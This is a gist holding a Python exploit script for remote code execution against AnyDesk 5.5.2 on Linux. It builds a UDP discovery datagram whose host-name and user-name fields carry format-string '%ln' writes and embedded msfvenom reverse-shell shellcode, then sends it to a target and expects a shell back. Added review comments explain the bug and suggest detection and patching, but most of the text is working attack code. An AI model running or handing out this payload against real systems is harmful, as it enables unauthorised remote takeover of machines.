@SomethingGeneric
Created November 15, 2025 19:52
# Exploit Title: AnyDesk 5.5.2 - Remote Code Execution
# Date: 09/06/20
# Exploit Author: scryh
# Vendor Homepage: https://anydesk.com/en
# Version: 5.5.2
# Tested on: Linux
# Walkthrough: https://devel0pment.de/?p=1881
#!/usr/bin/env python
import struct
import socket
import sys
# Destination of the single datagram sent at the end of the script: an
# RFC 1918 (private-range) address and the UDP port the packet goes to.
ip, port = '10.0.6.52', 50001
def gen_discover_packet(ad_id, os, hn, user, inf, func):
    """Serialize one discovery datagram and return it as ``bytes``.

    Fields are emitted in this order, with every integer big-endian:
    the 3-byte prefix ``3e d1 01``, ``ad_id`` as a uint32, a zero uint32,
    the byte ``02`` followed by ``os`` as one byte, the length-prefixed
    strings ``hn`` and ``user``, a zero uint32, length-prefixed ``inf``,
    a single zero byte, length-prefixed ``func``, and the 3-byte suffix
    ``02 c3 51``.

    Strings are encoded as latin1, so every code point below 256 becomes
    exactly one byte and the uint32 prefix (``len`` of the ``str``) equals
    the encoded size. ``hn`` and ``user`` are presumably the advertised
    host name and user name -- inferred from the parameter names only.

    Review note: the length prefix is the only framing applied to the
    string fields and nothing here restricts their content. A receiver of
    this frame has to treat every string as untrusted data and must never
    hand it to a printf-style routine as the format argument.

    Raises:
        ValueError: if ``os`` is outside 0..255.
        struct.error: if ``ad_id`` does not fit an unsigned 32-bit integer.
        UnicodeEncodeError: if a string holds a code point above 255.
    """
    def length_prefixed(text):
        # uint32 length followed by the latin1 bytes of the string.
        return struct.pack('>I', len(text)) + text.encode('latin1')

    zero_word = struct.pack('>I', 0)
    pieces = [
        bytes([0x3e, 0xd1, 0x1]),
        struct.pack('>I', ad_id),
        zero_word,
        bytes([0x2, os]),
        length_prefixed(hn),
        length_prefixed(user),
        zero_word,
        length_prefixed(inf),
        bytes([0]),
        length_prefixed(func),
        bytes([0x2, 0xc3, 0x51]),
    ]
    return b''.join(pieces)
# Command line the author recorded for producing the payload bytes below.
# msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.y.y LPORT=4444 -b "\x00\x25\x26" -f python -v shellcode
# The -b option lists bytes kept out of the encoded payload: 0x00, 0x25 ('%')
# and 0x26 ('&'). NOTE(review): presumably because the payload is carried
# inside a string the target scans for format directives -- confirm against
# the walkthrough linked in the file header.
shellcode = b""
shellcode += b"\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48"
shellcode += b"\x8d\x05\xef\xff\xff\xff\x48\xbb\xd8\xa2\x16"
shellcode += b"\xad\x3d\x82\xd4\x37\x48\x31\x58\x27\x48\x2d"
shellcode += b"\xf8\xff\xff\xff\xe2\xf4\xb2\x8b\x4e\x34\x57"
shellcode += b"\x80\x8b\x5d\xd9\xfc\x19\xa8\x75\x15\x9c\x8e"
shellcode += b"\xda\xa2\x07\xf1\x37\x82\xd2\x05\x89\xea\x9f"
shellcode += b"\x4b\x57\x92\x8e\x5d\xf2\xfa\x19\xa8\x57\x81"
shellcode += b"\x8a\x7f\x27\x6c\x7c\x8c\x65\x8d\xd1\x42\x2e"
shellcode += b"\xc8\x2d\xf5\xa4\xca\x6f\x18\xba\xcb\x78\x82"
shellcode += b"\x4e\xea\xd4\x64\x90\x2b\xf1\xff\x6a\xca\x5d"
shellcode += b"\xd1\xd7\xa7\x16\xad\x3d\x82\xd4\x37"
# Each byte is mapped to the code point of the same value, so the latin1
# encode inside gen_discover_packet reproduces the original bytes one-to-one.
shellcode_str = "".join([chr(b) for b in shellcode]) # Convert bytes to a string
print('sending payload ...')
# The third and fourth arguments (hn and user in gen_discover_packet) are not
# names: both start with the bytes 0x85 0xfe and carry printf-style conversion
# specifications with positional arguments ('N$') and '%ln' stores. This is
# the format-string class of bug: the receiver uses attacker-supplied text as
# a format, and the %n family writes the running output count through a
# pointer argument. The widths and positional indexes are the author's values
# for the tested build (header: version 5.5.2 on Linux); see the walkthrough
# in the header for their derivation.
#
# Defender view: a discovery datagram on this UDP port whose string fields
# contain '%' conversion specifications (especially ones ending in 'n'),
# non-printable bytes, or a field far longer than a plausible host or user
# name is anomalous and worth alerting on. Mitigation is a vendor release
# newer than the affected 5.5.2 plus filtering of this UDP port so only
# trusted segments can reach it.
p = gen_discover_packet(4919, 1, '\x85\xfe%1$*1$x%18x%165$ln' + shellcode_str, '\x85\xfe%18472249x%93$ln', 'ad', 'main')
# Dumps the raw frame to stdout before it is sent.
print(p)
# One connectionless UDP datagram; no reply is read, so the script gets no
# confirmation of what the receiver did with the frame.
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(p, (ip, port))
s.close()
print('reverse shell should connect within 5 seconds')